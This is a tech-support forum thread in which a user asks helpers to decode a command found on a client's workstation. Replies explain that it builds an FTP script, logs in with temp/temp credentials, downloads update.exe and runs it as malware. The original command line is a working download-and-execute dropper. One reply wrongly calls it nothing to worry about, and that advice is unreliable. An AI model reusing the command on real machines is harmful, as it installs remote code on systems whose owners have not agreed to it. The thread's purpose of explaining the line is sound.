Decoding hackers code


I loged onto a clients workstation today to find this in the run box

cmd /c echo open 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit

Please could sombody decode this so i am able to understand this
Who is Participating?
-n - Suppresses auto-login upon initial connection
-v - Suppresses verbose display of remote server responses
-s:filename - Specifies a text file containing ftp commands; the commands will automatically run after ftp starts.
It's simple.

It connects to in FTP port using windows FTP command
Then it enters username and password which is temp:temp
I mean username: temp
password: temp

then it downloads update.exe (malware/trojan)

Then it executes the update.exe (the malware) and exits.

That's all
It's downloading an update from a ftp site  to your C:\User\temp directory - running it and then deleting it - and then closing.
Get expert help—faster!

Need expert help—fast? Use the Help Bell for personalized assistance getting answers to your important questions.

ik - That's the name of the file containing FTP commands
I should mention that there is no

That's a prototype sample script for hackers. There is nothing to worry about this script
South ModModeratorCommented:
Hi apcsolutionsuk,

CSecurity has asked (at for an explanation of why you selected the answer(s) you selected for this question. It would appear the method you chose to close the question was not in keeping with EE policies, and you may like to consider selecting a more suitable answer as the solution or choosing a different disposition for the question altogether.


I would appreciate your help in recommending a more suitable form of closure for this question.

Please make your recommendations as to how this request should be closed. Your recommendations may include:

1) Delete / No Refund
2) Delete / Points Refunded
3) Accept one or more comments as the solution.
4) PAQ the question and store it in the knowledgebase, refunding the points

In the case of #3, please be specific and include the specific comment ID(s) which answer this question. To make it easier for us to process this request, when posting the comment ID(s) to use, please post them in the format http:#aCommentID. For example, http:#a12345678.

When making your recommendation, or if you are unsure what you should recommend, please keep the following in mind:

* Was a solution to the original problem found? If so, points should be awarded to the comment(s) which solved the problem.
* Did the Author solve the problem themselves, with Expert input? If so, you should recommend the Author's comment become the 'Accepted' solution, but recommend other Expert comments which should receive a 'split' of their points for contributing to the final solution.
* Did the Author solve the problem without using any of the Expert advice? If so, the question should be PAQ'ed with points refunded.
* If no solution was found, the question should be deleted. Points will not be refunded if the Author has not followed-up on one or more of the Expert suggestions or requests in the thread.

A Moderator will check back on this in about 4 days, at which point we will expect to see an explanation from the Author and a number of recommendations from the participating Experts. If either is not forthcoming, we will assume the unresponsive party is no longer interested in the final disposition of this question, and may close the question in a way which disadvantages you. If neither party responds, it will be at our discretion that the question may be deleted.

If you have any questions, please also post them below and a Moderator will be more than willing to address your concerns.

Community Support Moderator
1st comment of mine was explaining details in easy to understand details.
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.